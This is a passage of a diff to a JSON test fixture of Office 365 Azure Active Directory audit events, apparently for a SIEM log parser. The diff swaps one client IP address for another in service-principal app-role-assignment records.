nv_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -12452,9 +12452,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { 
@@ -12688,7 +12688,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -12718,9 +12718,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { 
@@ -12954,7 +12954,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
